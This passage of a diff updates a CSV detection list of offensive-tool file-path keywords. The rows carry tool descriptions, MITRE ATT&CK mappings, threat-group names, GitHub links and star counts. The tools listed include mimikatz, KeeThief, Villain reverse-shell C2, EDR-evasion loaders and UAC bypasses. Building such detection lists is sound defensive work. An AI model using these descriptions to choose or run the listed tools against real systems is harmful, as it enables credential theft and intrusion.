Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" -"*\hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*\HiddenDesktop\*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*\hijackers\*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*\HijackHunter\*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*\hoaxshell\*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*\HookDetector.csproj*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*\HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\hash_spider.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*\HiddenDesktop\*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*\hijackers\*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*\HijackHunter\*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\hoaxshell\*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*\HookDetector.csproj*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\HostEnum.ps1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*\HTMLSmuggler\*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","0","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" "*\huan.exe *","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" -"*\HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"*\HWSyscalls-Example.*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\HWSyscalls-Example.*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\hyperion.exe*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\Hypnos.exe*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" "*\Hypnos.sln*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" @@ -6174,119 +6263,150 @@ "*\icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*\IDiagnosticProfileUAC*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*\iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" -"*\impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\impersonate.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\Implant.exe *","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*\implant.exe *.exe","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" -"*\ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\InactiveDomainAdmins.csv*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*\inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*\injector.ps1 1 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" -"*\injector.ps1 2 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*\injector.ps1 1 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\injector.ps1 2 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\install_elevated.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\Inveigh.exe*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*\inveigh.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\Inveigh\bin\*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*\IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*\IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*\irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*\IOXIDResolver.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*\JuicyPotatoNG*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*\JunctionFolder.csproj*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*\katz.ps1*","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\JunctionFolder.csproj*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\katz.ps1*","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*\kdstab.exe*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*\keepass_discover.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\keepass_trigger.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\KeeTheft.exe*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","","N/A","","","" "*\kerberoast.c*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for 